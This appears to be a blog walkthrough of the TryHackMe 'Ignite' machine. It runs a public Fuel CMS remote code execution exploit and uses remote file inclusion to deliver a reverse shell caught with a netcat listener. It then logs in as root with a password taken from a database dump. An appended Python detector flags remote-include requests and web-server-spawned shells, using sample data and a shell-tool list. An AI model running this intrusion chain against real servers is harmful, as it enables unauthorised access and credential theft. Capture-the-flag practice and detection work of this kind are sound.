This post is a walkthrough of another THM box, Ignite. Let's get started.
First, we need to gather basic information about the ports and services on the machine, and for that I am using Nmap.
nmap -sC -sV -Pn 10.10.230.100
Based on the results we can see a web server running on it. Additionally, the website is a Fuel CMS instance running on Apache.
"A content management system is a computer software used to manage the creation and modification of digital content. CMSs are typically used for enterprise content management and web content management"
We got one entry in robots.txt. Let’s navigate to that path to gather more information.
As mentioned above, the site is built with Fuel CMS (version 1.4). If we scroll further we find some critical information about the website which will likely be useful to us later. I explored the admin console of the website but did not find anything useful.
I checked the internet for any exploits and luckily found one. Let's see what we can do with it.
This exploit works for all versions ≤1.4.1 and uses Python 2.7. To use this exploit against the server, we need to modify some of the fields in it. Let's change the URL to the target web server and modify the command to whatever custom command we want; here I am changing it to a basic command, "whoami".
The exploit includes Burp request information, so let's intercept the traffic and see what it shows:
We executed "whoami" as our command and the response was accurate (www-data, which is the user account the web server runs as). Let's try one more time to make sure that it's working as designed.
Okay, we got the result. Now we are going to use the database path that we got from the website to check whether we can get any useful information.
Hurrah, we got the whole dump of the database, including the root password; we will store these credentials for future use. But before that, we need shell access on the web server, which can be done using a reverse shell. The question is how we are going to gain the shell. We can use a file inclusion vulnerability to upload the reverse shell to the target machine. Let's start a simple HTTP server using Python.
python -m SimpleHTTPServer 80
We can see an HTTP server running on localhost; now we need to provide the path of our reverse shell script in our Burp request.
We provided the path of our reverse shell in the Burp request of the Fuel CMS exploit, and it worked.
Now we need to set up a listener on our host using Netcat.
nc -lvnp 1234
We got our shell with www-data as the user. Now we need to find the first flag.
We got our first flag. Now we need to do privilege escalation to get root access as well as the root flag. But remember that we got the root credentials from the database dump. Let's try them to gain access.
Yesssss! We got root access using the credentials and were able to read the root flag too.
Thanks for reading, and please leave comments so that I can improve.
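From the defender's side, the chain above (a remote URL fed to a file inclusion parameter, followed by the web server account spawning a shell that connects back to the attacker's listener) leaves two distinct traces: the inclusion request in the web server's access log, and a shell-like process under the web server with an outbound connection. The script below is an added example, not part of the original post or of Fuel CMS; it runs over constructed sample data (the access log lines, process table and socket table are made up, and the `/app/include?file=` path, the 10.8.1.2 address and the timestamps are illustrative) and correlates the two signals on the peer address.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache-style access log (not from the original post).
ACCESS_LOG = """\
10.8.1.2 - - [12/Mar/2023:10:01:02 +0000] "GET /robots.txt HTTP/1.1" 200 64
10.8.1.2 - - [12/Mar/2023:10:01:09 +0000] "GET /about HTTP/1.1" 200 5120
10.8.1.2 - - [12/Mar/2023:10:02:30 +0000] "GET /app/include?file=http://10.8.1.2/rev.php HTTP/1.1" 200 118
10.8.1.2 - - [12/Mar/2023:10:02:31 +0000] "POST /login HTTP/1.1" 302 0
"""

# Constructed process table in `ps -eo user,pid,ppid,comm` layout.
PROCESSES = """\
USER       PID  PPID COMMAND
root         1     0 systemd
root       812     1 apache2
www-data   850   812 apache2
www-data   851   812 apache2
www-data   990   851 sh
www-data   991   990 nc
"""

# Constructed socket table: state, local address, peer address, owning PID.
SOCKETS = """\
LISTEN 0.0.0.0:80          0.0.0.0:*        812
ESTAB  10.10.230.100:80    10.8.1.2:53122   850
ESTAB  10.10.230.100:41534 10.8.1.2:1234    991
"""

WEB_SERVICE_USERS = {"www-data", "apache", "nginx"}
WEB_SERVER_BINARIES = {"apache2", "httpd", "nginx", "php-fpm"}
SHELL_LIKE = {"sh", "bash", "dash", "nc", "ncat", "netcat",
              "python", "python2", "python2.7", "python3", "perl"}
SERVICE_PORTS = {80, 443}          # ports the web service legitimately serves on
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) ')


def find_remote_includes(log_text):
    """Return (source_ip, parameter, url) for each request whose query
    parameter carries a remote URL, the classic remote file inclusion sign."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if value.lower().startswith(REMOTE_SCHEMES):
                hits.append((m.group("src"), name, value))
    return hits


def parse_processes(text):
    """Map PID -> {user, ppid, comm}; the first line is the header."""
    procs = {}
    for line in text.splitlines()[1:]:
        user, pid, ppid, comm = line.split(None, 3)
        procs[int(pid)] = {"user": user, "ppid": int(ppid), "comm": comm}
    return procs


def parse_sockets(text):
    """Map PID -> list of (state, local, peer)."""
    by_pid = {}
    for line in text.splitlines():
        state, local, peer, pid = line.split()
        by_pid.setdefault(int(pid), []).append((state, local, peer))
    return by_pid


def descends_from_web_server(pid, procs):
    """Walk the PPID chain; True if the process or an ancestor is the web server."""
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        if procs[pid]["comm"] in WEB_SERVER_BINARIES:
            return True
        pid = procs[pid]["ppid"]
    return False


def find_reverse_shells(procs, sockets):
    """Flag shell-like processes owned by the web service account, spawned under
    the web server, holding an established connection on a non-service local
    port (an outbound connection rather than a client hit on :80)."""
    findings = []
    for pid, p in procs.items():
        if p["user"] not in WEB_SERVICE_USERS or p["comm"] not in SHELL_LIKE:
            continue
        if not descends_from_web_server(pid, procs):
            continue
        for state, local, peer in sockets.get(pid, []):
            if state == "ESTAB" and int(local.rsplit(":", 1)[1]) not in SERVICE_PORTS:
                findings.append({"pid": pid, "comm": p["comm"], "user": p["user"], "peer": peer})
    return findings


def correlate(log_text, proc_text, sock_text):
    """Join both signals on the peer IP: a shell calling back to the same host
    that served the included file is rated high confidence."""
    include_hosts = {urlsplit(url).hostname for _, _, url in find_remote_includes(log_text)}
    shells = find_reverse_shells(parse_processes(proc_text), parse_sockets(sock_text))
    return [{**s, "confidence": "high" if s["peer"].rsplit(":", 1)[0] in include_hosts else "medium"}
            for s in shells]


if __name__ == "__main__":
    for alert in correlate(ACCESS_LOG, PROCESSES, SOCKETS):
        print(alert)
```

The process check deliberately requires all three conditions (web service account, ancestry under the web server binary, established socket away from the service ports) because any one of them alone is noisy: www-data legitimately owns apache2 workers with client connections on port 80, and an interpreter under the web server is normal for CGI. The correlation step is what turns two medium signals into one alert worth paging on.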
My other walkthrough article — TryHackme -Brooklyn 9–9 Walkthrough